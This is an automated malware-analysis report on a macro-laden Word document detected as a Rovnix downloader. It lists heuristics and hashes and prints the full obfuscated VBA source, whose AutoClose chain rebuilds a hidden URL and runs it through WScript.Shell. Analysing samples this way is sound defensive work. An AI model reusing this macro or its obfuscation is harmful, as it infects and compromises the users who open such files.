MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Rovnix-6497736-0. It contains VBA macros, specifically an Auto_Close macro that uses CreateObject to execute a second-stage payload. The presence of VBA macros and the downloader behavior strongly suggest a Rovnix family infection, likely delivered via spearphishing.
Heuristics 7
-
ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
uAMiTvXWu = Acos(269) - 2280 - Acos(4545) - Acos(3280) Set JSGHUWNbQPiIVii = CreateObject(KvUDoXVnAHriGfXVrQ) Call JSGHUWNbQPiIVii.Run(MwYvLMGnrDcdyO, 0) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
End Sub Sub AutoClose() pUkFjLWrCpP = 2807 + 2622 -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14166 bytes |
SHA-256: b6f5f626347110fe1e6cabe4b40c62042317a6f6f75a8270461504003caaf217 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
336 of 400 identifiers look randomly generated (e.g. 'bjFkCRXZvBVELWYEYzVKZbgEhfZEdjzQnvNEwcdL') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub cquwTUpZAbMcoP()
pYvPdxFZDFb = Left("FuTVTPQcTy", 10) + "kTzUFOxBTVXE" + Left("dMHVofYWxp", 2) + "vPcPp" + "iBSgKjbHfNDWg"
SfcqCTUiJIK = 2386 + 2645 + Acos(1600) + 97 + Acos(3976) + Acos(2304)
IPjNOdZdRB = "CTQPSqX" + Left("PRBKHpnRCF", 7)
Application.Run "WunPJkSfdBfuUE"
RgGIgVUQLUj = Left("IcUVEIWoOo", 8) + "DBYPM" + Left("jBgbAyHVcG", 10) + "WJKHNJggdd" + "MJIO" + Left("ucIqVOcCDg", 1)
AnGXxbwFETjd = 4492 + Acos(4901) + Acos(2797) + 3998 + 4039
VFcNzZDcdZ = 2827 + 3529
gHbLELd = Acos(2858) + Acos(2545) + Acos(3611) + Acos(2362) + Acos(2712)
GFYQzScvSQy = 3635 - 4667 - 2232
TjGfNuS = Left("bZCFNUiOYB", 4) + Left("vTUAHUbfRj", 5)
cYJSjLEY = Acos(4265) + 1304 + 4386 + Acos(4171) + 2913 + 980 + Acos(2600)
End Sub
Sub TVTPQcTyZVFNkT()
TqiUpQNyZ = Acos(2647) + 2943 + 1026 + Acos(4268)
JkSfdBfuUEA = Acos(1762) - Acos(1120) - 30 - 1088 - 1528
dYvLuTzQnWbO = 954 - 4467 - 996 - Acos(4222) - Acos(2579)
Application.Run "HvFcEcjWKKTqNGkfVH"
gkIYBAgEMG = 2120 - Acos(1979) - Acos(3463) - Acos(4764) - 936 - 4646
kNSooXEf = Left("ouQnAfvMzg", 1) + Left("NADcOACIGF", 5) + "cAxxvHGGUcV" + "oQ" + "rNTMjxLdTPUQxE"
yniDGEwI = "zzbuFcN" + "dBQYWxSASDXoNyU" + Left("nRGVACvIrg", 8)
rTAHfIESErd = 3068 - 548 - Acos(2141)
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function ZnMMjLIvoULoc(CFpopKBKVnBnGwd, STJVQXbEcwEiLqcJr, UGXYVTrNBbxUxYR)
jXqYfPz = LTrim("BpfkupQEZidSxVCRO") + LTrim("A") + LTrim("kAZGnrVOSUdgMYQgUPX") + "UBgRApQcXFnRqwUUNiXCkSZuXXgGVA" + "PzTpVrQQvHdV" + "VyBXKBKDCLMq"
fnAfNzn = "nWEzNCEvrDXM" + "KRXCPOEcj" + "xXIEEnuWpYzEGDOuiELOZqbRQzj" + "UnYwHX"
LrdizVw = LTrim("MGCc") + "QyNnx" + "pXRowbdzkkGwKfdxvQPuiWxECGiT" + RTrim("ypAOxXWCQFzMKIJPAqRE")
zDdGvkjJowVu = Acos(4636) - 1358 - 1479 - Acos(2231) - Acos(449) - 494 - Acos(4534)
ZnMMjLIvoULoc = Replace(CFpopKBKVnBnGwd, STJVQXbEcwEiLqcJr, UGXYVTrNBbxUxYR)
dvuuJQJ = Acos(1418) - 3684 - 876
YWBHXYMrSNdo = Acos(2422) + 174 + 2289 + Acos(2084) + 2593 + Acos(592)
DXbjXTquqgwg = "QCxwM" + "NLiHnGpMY" + Left("JyTWGvKnpd", 4)
BLobFTJVyqp = LTrim("TwTnQFbInwSxrGrcRGRMYnzYCPEWHi") + RTrim("OQUkqzbbnfHcCzwGJDDC") + "gRRvruOXwDQSjxGMczkQTGk" + "LVkJuUSZgX" + LTrim("zikLExirBEJSfEufMVpnoGcVW")
byxMfOIkOjAb = Acos(3677) + Acos(4165) + 686
HdVoFRWPpTx = Acos(3834) - 4561 - Acos(4903) - Acos(3882) - 1798 - 505
vKUrRZWdfrQ = "BQCT" + "NXxuLEK" + "gNxPzBEjQC" + Left("XkuvjvwSdv", 4) + "jj"
QqxgCkiwqf = 515 - 1783 - Acos(1254)
UUgSNYBXc = Left("TOdVMbgFrK", 6) + "JNICuMc" + Left("yGZnQTxGvX", 10) + "ACpBdncG"
XDKPzBWS = "ZzzZgXHNpRbwpYu" + "EINIunyFMGrJuy" + "XLPgV"
EBBUoPJY = 4967 + 4600 + Acos(1973) + 3608 + 2306 + Acos(2420) + 4347
OPXAJbOTZrOw = 883 - 4410 - 4619 - 250 - 344
GPGpzpRpFZo = Left("kYOCubxGbZ", 7) + Left("KbSbonAYxH", 9) + Left("cYwUVvzkZT", 8) + Left("dwAPTVvJPA", 9)
End Function
Sub HvFcEcjWKKTqNGkfVH()
ZbDpBTHHGkG = Left("VPjiTEqTpI", 10) + Left("NDEniRVCDn", 5) + "gfFgxfnRk"
vLVPXEyEUd = "FciNdoTTWK" + Left("gWLfdkNwOW", 4)
ZIzxCrMjP = "IuVcGFYngIEIWRdArb" + "FxfUqIIdDLUKgHEwyOHwqkMzbu" + "iVdfgLGHnUZxUGFq"
KDQJXJwR = 1846 + 629 + Acos(3195)
rKzJzdWNgFr = LTrim("fYbEAduIZwfrkZFyZEBqV") + "ToUnxcwAxkiSvKyoojVXEMU" + "ZqNTEccnjFKXgHDOgEfKxowvIYOQ"
bXdXifTTcbrpR = "bjFkCRXZvBVELWYEYzVKZbgEhfZEdjzQnvNEwcdLfXRWZcWRd hfZEdjzQnvNEwfZEdjzQnvNEwp://qdkngijbqnwBykyxyiCpfYNhiqwrbzudwBykyxyiCpfYN.cobjFkCRXZvBVE/REX/LWYEYzVKZbgEiUTgXVLDkiiLick.php?ufZEdjzQnvNEwbjFkCRXZvBVEcdLfXRWZcWRd=bobjFkCRXZvBVEbf"
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "bjFkCRXZvBVE", "m")
DJwIqLFr = 1347 + Acos(3369) + 1372
XrkfWnwpB = 705 + 4394 + 2739
RzEqkQkEAjdi = 1287 - 1164 - 2727 - Acos(2654) - 2025
KGNqzvGOK = Left("ndCQTOLQoO", 4) + Left("YYDXWQjDFu", 8)
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "cdLfXRWZcWRd", "a")
UFTvGAiJWoFI = 4678 - 3742 - 4625 - 2734
dVMIzPQwz = 3688 + 160 + 1237 + Acos(1241)
HNJDQSFfwowE = "PkJZFTSDTqIRKX" + RTrim("u") + RTrim("Dqky") + "SXfBKQowIwJKUBubnBMDPoPNvcZOf" + RTrim("SrjGYPnpGuAZCSCFcSygfqP")
nwpddfHiSo = Acos(2948) - Acos(1138) - 4852 - 1587
yVYjUWJT = RTrim("jqiUJ") + LTrim("NpzWTYkVz") + "wp" + LTrim("FOLbzCFbIQKdTY")
SxnoCLgGu = "RJX" + "FoMupuLbNcg" + "YLBwOvJfy"
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "LWYEYzVKZbgE", "s")
kGKoJKYRixV = 1671 - Acos(3042) - 43 - 4512
ZCEiGVpr = 568 + Acos(162)
oJBxxgZgFCq = 2611 + Acos(671) + 3465
EQIwvgvUMETT = 2158 - Acos(4821)
xYMkUICb = Acos(1321) + Acos(3123)
zVByGgjVAHrN = 737 - 2638 - 2517
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "fZEdjzQnvNEw", "t")
BbxrdNu = Left("dySwCLHDNV", 10) + Left("YzzIykgziP", 4) + Left("uCEVxjZyfG", 8)
xrnGqurMKvu = Acos(2989) + Acos(2179) + 2070
KfBLyEG = "RJpkzrJIwcPwNgAv" + "cMIuzYZMXfGbIGdITHLvLMkCDbNXwg"
KFbMFknf = "VPTxnIk" + "zQHJQpjDcjOFwxwyBpyiGHUvAQr"
VTuvOpUGqWk = 1254 + 4206 + 3585
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "BykyxyiCpfYN", "e")
GRypEDUfi = "wxAjYxHAnHFKpSqzSDkRnz" + "V"
wdUHxPggGZn = 253 + Acos(3029) + 591 + Acos(2724) + 2598
MxCUyfd = Acos(4487) + 4274 + Acos(958) + Acos(4009) + 34 + 2744 + 875
NBbZkHBDbXFR = "ZPnJrfXuHUiAJD" + Left("IQjbriBiSv", 1)
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "iUTgXVLDkiiL", "l")
bFFLKcjAI = LTrim("UC") + "yGCpxMyLTFTXTKIvRkVNNKz" + "xwMzDP"
jVFAoHcQPvNp = 2895 + Acos(3530) + 537 + 1403 + Acos(3919)
ncfIXOVoxvUDRpjLjC = "WScripTciikLiKwQjz.ShQHpCkALpojuJLGHHGPUnLHWcLGHHGPUnLHWc"
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "KIipNUvWNMpo", "m")
DJwIqLFr = 1347 + Acos(3369) + 1372
XrkfWnwpB = 705 + 4394 + 2739
RzEqkQkEAjdi = 1287 - 1164 - 2727 - Acos(2654) - 2025
KGNqzvGOK = Left("ndCQTOLQoO", 4) + Left("YYDXWQjDFu", 8)
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "DEoNgiZngzWk", "a")
UFTvGAiJWoFI = 4678 - 3742 - 4625 - 2734
dVMIzPQwz = 3688 + 160 + 1237 + Acos(1241)
HNJDQSFfwowE = "PkJZFTSDTqIRKX" + RTrim("u") + RTrim("Dqky") + "SXfBKQowIwJKUBubnBMDPoPNvcZOf" + RTrim("SrjGYPnpGuAZCSCFcSygfqP")
nwpddfHiSo = Acos(2948) - Acos(1138) - 4852 - 1587
yVYjUWJT = RTrim("jqiUJ") + LTrim("NpzWTYkVz") + "wp" + LTrim("FOLbzCFbIQKdTY")
SxnoCLgGu = "RJX" + "FoMupuLbNcg" + "YLBwOvJfy"
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "JBnKCrLFCwWg", "s")
kGKoJKYRixV = 1671 - Acos(3042) - 43 - 4512
ZCEiGVpr = 568 + Acos(162)
oJBxxgZgFCq = 2611 + Acos(671) + 3465
EQIwvgvUMETT = 2158 - Acos(4821)
BxSYYDG = Acos(4250) + 1796
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "TciikLiKwQjz", "t")
BbxrdNu = Left("dySwCLHDNV", 10) + Left("YzzIykgziP", 4) + Left("uCEVxjZyfG", 8)
xrnGqurMKvu = Acos(2989) + Acos(2179) + 2070
KfBLyEG = "RJpkzrJIwcPwNgAv" + "cMIuzYZMXfGbIGdITHLvLMkCDbNXwg"
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "QHpCkALpojuJ", "e")
GRypEDUfi = "wxAjYxHAnHFKpSqzSDkRnz" + "V"
wdUHxPggGZn = 253 + Acos(3029) + 591 + Acos(2724) + 2598
MxCUyfd = Acos(4487) + 4274 + Acos(958) + Acos(4009) + 34 + 2744 + 875
NBbZkHBDbXFR = "ZPnJrfXuHUiAJD" + Left("IQjbriBiSv", 1)
oYJvIYjC = 3693 - 3416 - Acos(4640) - 642 - 2390 - Acos(1929) - 2511 - Acos(4796)
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "LGHHGPUnLHWc", "l")
bFFLKcjAI = LTrim("UC") + "yGCpxMyLTFTXTKIvRkVNNKz" + "xwMzDP"
jVFAoHcQPvNp = 2895 + Acos(3530) + 537 + 1403 + Acos(3919)
KFZDXMnLDkE = Left("HFjfSKAFqS", 1) + Left("RqXGRZvjFF", 6) + "NHGdojRnbGKEH" + Left("WWRFMBvENn", 1) + Left("GikxGgOnKf", 10)
zDjvSrwYSvGJ = Acos(4599) - Acos(2487) - Acos(4863) - Acos(4955) - Acos(4890)
DKqqAvSrO = Acos(1047) - 3888 - Acos(1910) - 1090 - 242
WPIxFMPUg = "SnZwdfGEFZoH" + "zJR" + Left("KzciSzboGW", 2) + Left("FjfpwocGXd", 7)
ZMXBqQgU = 719 - 2302 - Acos(764)
PMgSpEnvEE = "ONcVIdCf" + "UIxcJncfop" + "qrpIpGvKHWSTvX" + "NILuTRDYAvTUcU"
wjEOMIMNdNDObkruKn bXdXifTTcbrpR, ncfIXOVoxvUDRpjLjC
RdKCPOivxc = Left("PRxuQUCRYH", 7) + "ITLA" + "CgDLfOzdAKELrj"
qYHuiSIbxxR = Acos(3556) + Acos(1813) + 3414 + 925
IOiJvubUiNxk = Acos(1315) - Acos(2496) - Acos(30) - 831 - 3401 - 4360 - 4182 - 1537
byxMfOIkOjAb = Acos(3677) + Acos(4165) + 686
HdVoFRWPpTx = Acos(3834) - 4561 - Acos(4903) - Acos(3882) - 1798 - 505
vKUrRZWdfrQ = "BQCT" + "NXxuLEK" + "gNxPzBEjQC" + Left("XkuvjvwSdv", 4) + "jj"
QqxgCkiwqf = 515 - 1783 - Acos(1254)
fLqTEYVYpS = Acos(2198) + 3234 + Acos(3226) + 2543
WDHpDPNWNW = Acos(1825) + Acos(2609) + 4586 + 663
pJJPoKxD = 2508 - 4998 - Acos(3873) - 4259
End Sub
Sub wjEOMIMNdNDObkruKn(MwYvLMGnrDcdyO, KvUDoXVnAHriGfXVrQ)
QvHBHPB = "f" + "ocBDRFLqNfNQrfJwvDbJnSYUO"
GGUAHCvuvSyg = Acos(4199) - Acos(2388) - 1101
CJkpyikVgRi = Left("PryyDxiVOO", 2) + "KkipzjKb" + Left("HCbYxMQZXq", 7) + "TcVvi"
MHZGUvJxNgIA = 4385 - Acos(4943) - 2294 - Acos(2453) - 1304 - Acos(1757) - Acos(2607)
jxYzRVCUVodx = 2778 + 4948 + 2921 + 4292 + 1294
KvroZAorCpkM = 3367 + 1058 + Acos(4112) + Acos(3079) + Acos(772)
frGLvUuID = Acos(939) - 1815 - 1099 - 2781 - Acos(1861)
JTkkKDUZPZdS = Left("OAGYxVkTDJ", 1) + "BUIUgpccnOSU" + "CgoWzSvK" + "JodGwPAUNcRqqix"
HUIPOzLvnqU = Left("JYirpMHyLx", 6) + "PkWOoPWVDZjTNc" + "JfCUZYGD" + Left("vAxxNrvdnj", 10)
KBGjLvZ = 1591 + Acos(3073) + Acos(917) + 853 + 2507 + 769
uAMiTvXWu = Acos(269) - 2280 - Acos(4545) - Acos(3280)
Set JSGHUWNbQPiIVii = CreateObject(KvUDoXVnAHriGfXVrQ)
Call JSGHUWNbQPiIVii.Run(MwYvLMGnrDcdyO, 0)
LoNnUDvu = Left("uQCkOpQROQ", 10) + "ovQdqxuCv" + "gudRTwP" + "RuGxkbC"
OHKIiSbiSJ = "GE" + Left("AgAXdPNprC", 7) + Left("NofCCfIJnw", 7) + Left("GVpUTIUuSC", 1)
kTRnIBnqQ = "HOXOHrgXQN" + "ArNkqMYrFkyBjJIAyGMAiXrkLozT" + LTrim("nSrAvJ") + LTrim("cYcFWkS")
dvuuJQJ = Acos(1418) - 3684 - 876
YWBHXYMrSNdo = Acos(2422) + 174 + 2289 + Acos(2084) + 2593 + Acos(592)
End Sub
Sub WunPJkSfdBfuUE()
VBfbFFrXqKjD = "CCZBzrJbdRqKSjfpOVRd" + LTrim("u") + "zfqjDATEdKCxcw" + "IjAMciRRNZfpqBEAOOdyOHYFyngVq"
NSgTjkxY = "vkBn" + "QpKFIbPKUYqAvBHY"
SMTbMWqLwg = "qM" + "FCqGuSMqvPKfC" + Left("OfRXDZvYcE", 4) + "OqVBfojbuv"
Application.Run "AFxnSxnSPVHqnM"
MBNpDLxgxo = 4587 + 149 + 3385
ENDIFWkICZjB = Acos(1463) + 3495 + Acos(2751)
JoXRSJpGgdjW = 2114 + Acos(1609) + Acos(4752) + 3599
End Sub
Sub AutoClose()
pUkFjLWrCpP = 2807 + 2622
EOfvCow = Acos(3923) + Acos(1810) + Acos(215) + Acos(2816) + 3047 + 155 + 95 + 3148
IrZyyVLnI = 4704 + Acos(3732) + 1000 + 620 + Acos(3799) + 1774 + 1086
DuCSTJDgnEoX = "vNzZUOSCwv" + LTrim("pU") + "WwVMog" + "IbYqwYJpqkQPRKJOb"
RTXdKPi = "HNSDXIA" + "ooBBDiuwkRCxEQiLBcQdqYHMSIivB" + LTrim("uo") + RTrim("PSUSDqYyuYdOWvI") + RTrim("KVUDWoprwkJyccURGEw")
wPSYnuILzRWf = Acos(2876) + Acos(2366) + Acos(4110)
Application.Run "nyTqiUpQNyZIoP"
pgrjkKMC = 2490 + Acos(175) + Acos(3374) + Acos(4885) + 4061 + 1299
vjwYirS = 3885 + Acos(1597) + Acos(2671) + Acos(247) + 545
kqgdORY = "VrgwUnKyvGXqKEnRTKgyzbWS" + "CVzGnugwrV" + RTrim("ZVFiUJVnKQbwBGPGSMBvW") + "uBHPdYpWQOoCHXwzc"
ROyTADNRk = Acos(479) - Acos(2140) - Acos(256) - 199 - 1193 - Acos(658)
WzdWiRuQ = "rwkzQHcDbKRjnyBXcjAZQQNVi" + "uDJjbQLkDvVzBAQYiYrBorU" + "FbbgNQL" + "JIdrgAJMQHJnXWZwqQnpYboDQX"
wAkkYdAGxCx = 4971 + Acos(3884) + 2884 + Acos(3306) + 4369
fJdxpKFzz = "cXO" + "pY" + RTrim("NnGXOMidSYnMuBVibiSc")
End Sub
Sub nyTqiUpQNyZIoP()
iPfMZyyirJIX = 2946 - 824 - Acos(1432) - 1593 - Acos(3901)
GkkqyzNYGV = "qJvoKfPbxKkoHpDxcjpIW" + LTrim("SukBRfkbCiIVNzgTTzMdNicpLYnIFX") + "DSxYJbKMQycOWFozFGyHIf"
NzyHEvQBx = Acos(1508) - Acos(162) - Acos(1807) - Acos(2788) - 4087 - Acos(1289) - 2506
WZAoVQBLzi = LTrim("GFLAAMAoufEyoWQXQWH") + LTrim("FSSIbYKcOiExnALzvBQGIug") + "wYcvNAHnYwnprGPfy" + RTrim("QvbxYNPkSZMKNHUb")
iFUwBrzI = RTrim("ROMIgzRoRTcRkVvbUViWjNAgNLNL") + "ojWFRWxEgTwxinMbDJPWvzxgkoUY"
Application.Run "cquwTUpZAbMcoP"
ccGTujqoIj = Acos(4121) + Acos(618) + 85 + Acos(2410)
NyLqpJAkPK = Acos(4546) + Acos(4623) + Acos(2421) + 946 + 1670
NbZPryQo = Acos(3799) - 4146 - Acos(4523)
uvALvYKA = "kCoKPROZGxQWbpDrf" + RTrim("SAiAoHS")
YAJnTkCodC = Acos(3042) + Acos(4787) + 1384 + 1983
End Sub
Sub QnWbOTyZDTXLFu()
AJDRATuTVpC = Acos(3203) + Acos(3695)
PpkuWSqJcqy = "vSLAAgiZ" + "ATRyIIYjUE" + "GvX" + "Yiyn" + Left("HxPDRwDDDn", 3) + "NrJzjrEBq"
NLvGwxiQZpb = "XNCAkfIpfTxYzzoMyHicNNFdJLCx" + "dFSoNDpBBVRf" + RTrim("bzyQDCGwBUuiAvXJ") + "SyMPncHjKg"
yLFZuwq = "xkvAPLQ" + Left("TiOndQOgiP", 6) + "ybNdMVBPK" + "TNYqwHXBPTL" + Left("PdfncxXVUD", 4) + "KrLcWJFIIdVy"
Application.Run "TVTPQcTyZVFNkT"
uwXpcwj = 3376 + 3598 + 3425 + Acos(2179) + Acos(4956)
BdDHjjYxoNz = Acos(3489) + 3411 + 1384
End Sub
Sub AFxnSxnSPVHqnM()
XBKDUxBPFik = Acos(1477) + Acos(3775) + 4212 + Acos(3440) + 1944 + 162
OgISkDzKWHJ = 39 + Acos(3113) + 4588 + Acos(4635) + 2130 + Acos(860)
dkJyJwguqz = "qoEQRwCVn" + "NFxnpfYvf" + LTrim("uYK") + "RF"
Application.Run "uSHVEzXdYvLuTz"
WKYREfLYDGRu = "WvuIGdbGxkJPORxgLF" + LTrim("LZInkNcQKYVUUcL") + "vvWEuxKkIrbZLikUDEVkFFx" + "wRKwbwkSgKOuRHzyVBHkFjro"
JBYdcquOFJ = "SyfTKvyGRQ" + Left("ZknkAuiOUD", 3)
zqIEWrQncx = Left("WRBOwOvcQk", 7) + "SidwWIT" + Left("wEgfXRiHCW", 3) + "LvrZyZoVMu"
qngbIgoIBH = "iPLZoVgbpZNwKkRUBbfWgHNvFECBrW" + RTrim("LLYUdZwkAyU") + "FPDuQPibIUIkBnkJrrEOHq" + LTrim("bQZNdWDVQdxvydFIIqCSLE")
iooXWQORP = Acos(1682) + 894 + 2776 + Acos(3606) + 1993 + 4001 + Acos(4352)
End Sub
Sub uSHVEzXdYvLuTz()
OcGTWACNvdH = RTrim("pNgW") + "bjp" + "ToUQKqTiqiCXNZ" + LTrim("EvnjiwUyPMRDryHoZS")
rkZkLobjjTz = LTrim("FVjOKMnMgBOw") + "rBNSHuAQUyBjpVLVqHzCcLDTk" + LTrim("yKBwXWffPWzFHZUSHZCEErK") + "zcDEnEDLYQuCoYiPVHKVC" + LTrim("kvEOQxoSqciNLDfxIFAoovbqbInXj")
Application.Run "QnWbOTyZDTXLFu"
vdCgnNR = RTrim("rborHnruAIywnOILMG") + "FxDQJGWGv" + RTrim("dWRTdzBiSNPUCbGdJd")
CUfNgJcP = "AzynzTEKX" + RTrim("QzcbCIKD") + "yAwOWWu" + RTrim("NuJQTdbPwvzKSSiYyRcJHXAjF")
CZTNwxRT = Acos(2583) + Acos(1968) + 2725
TMJoKBTD = "qVKrYxVP" + Left("jPPFiGrWdd", 7) + Left("GzujXBXpFu", 6)
oHFBJyp = 3854 + Acos(2581) + Acos(3512) + 1487 + 285
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes |
SHA-256: 2e3aa35d7fc025330246bd690b98bf9b1f2bf1805b2c00d314b900246d7c49a4 |
|||
|
Detection
ClamAV:
Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload:
likely
808 of 1043 identifiers look randomly generated (e.g. 'bjFkCRXZvBVELWYEYzVKZbgEhfZEdjzQnvNEwcdL') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.